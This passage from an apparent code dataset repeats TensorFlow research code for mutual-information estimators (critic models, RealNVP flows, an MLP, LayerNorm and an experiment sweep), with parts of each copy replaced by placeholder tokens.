x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = 
critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = 
tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., 
:self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n 
loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
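The step above still carries the js_fgan_lower_bound objective (the Jensen-Shannon lower bound of Nowozin et al., 2016) computed from a square matrix of critic scores whose diagonal holds the positive pairs. The NumPy sketch below reproduces that computation outside TensorFlow; the random toy score matrix is an illustrative assumption.

# NumPy sketch of the Jensen-Shannon fGAN lower bound on an n x n score matrix.
import numpy as np

def softplus(x):
    # Numerically stable log(1 + exp(x)).
    return np.logaddexp(0.0, x)

def js_fgan_lower_bound(f):
    f_diag = np.diag(f)
    n = f.shape[0]
    first_term = np.mean(-softplus(-f_diag))                      # positive pairs
    second_term = (softplus(f).sum() - softplus(f_diag).sum()) / (n * (n - 1.0))
    return first_term - second_term                               # off-diagonal (negative) pairs

scores = np.random.randn(8, 8) + 3.0 * np.eye(8)  # toy scores with a strong diagonal
print(js_fgan_lower_bound(scores))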
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, 
trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n 
**condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
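The logistic_fit helper retained in the step above is a linear-evaluation protocol: representations are frozen, rescaled, and classified with multinomial logistic regression, and the test accuracy is reported. Below is a compact scikit-learn sketch of that protocol on synthetic features; the data shapes and the regularisation settings are assumptions made only to keep the example runnable.

# Sketch of linear evaluation: fit a logistic regression on frozen features
# and report test accuracy. Synthetic data stands in for learned embeddings.
import numpy as np
from sklearn.linear_model import LogisticRegression
from sklearn.preprocessing import MinMaxScaler

rng = np.random.default_rng(0)
x_train, y_train = rng.normal(size=(500, 32)), rng.integers(0, 10, size=500)
x_test, y_test = rng.normal(size=(200, 32)), rng.integers(0, 10, size=200)

scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
x_test = scaler.transform(x_test)

clf = LogisticRegression(solver="saga", tol=0.1, C=10.0, max_iter=200)
clf.fit(x_train, y_train)
print("linear-eval accuracy:", clf.score(x_test, y_test))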
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, 
trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one 